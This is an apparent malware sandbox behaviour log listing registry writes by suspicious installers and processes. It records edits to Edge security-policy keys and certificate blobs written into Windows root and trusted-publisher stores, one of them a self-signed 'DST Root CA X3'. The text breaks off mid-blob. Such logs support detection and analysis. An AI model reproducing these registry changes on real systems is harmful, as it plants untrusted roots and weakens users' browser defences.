created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "335820496" Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration Esplorarne.exe.com Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ} svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800" Esplorarne.exe.com Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "2201" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage Esplorarne.exe.com Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{C27FFD2E-286A-4DC9-8394-C854D6308C6B}" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus Esplorarne.exe.com -
Processes:
Setup.exeGameBoxWin64.exeECvDauLMIp4oydGLLNSJGk70.exeEsplorarne.exe.comCleaner Installation.exeSetup.tmpRUNDLL32.EXEEsplorarne.exe.comSetup (16).exeRUNDLL32.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 5c000000010000000400000000040000190000000100000010000000c1bb95d96de3ba0c2a983966f72224a0140000000100000014000000f556120c3053ddf82e1ca30b580aa0288a2260ad0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc0f00000001000000200000001d8788fb900790f20b92141e950c8a1eb438213e9836a97a805442a3f7b5befd04000000010000001000000046d5bfface94364c5dab5abfeef969062000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a ECvDauLMIp4oydGLLNSJGk70.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 140000000100000014000000f556120c3053ddf82e1ca30b580aa0288a2260ad0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc2000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Cleaner Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc2000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (16).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (16).exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b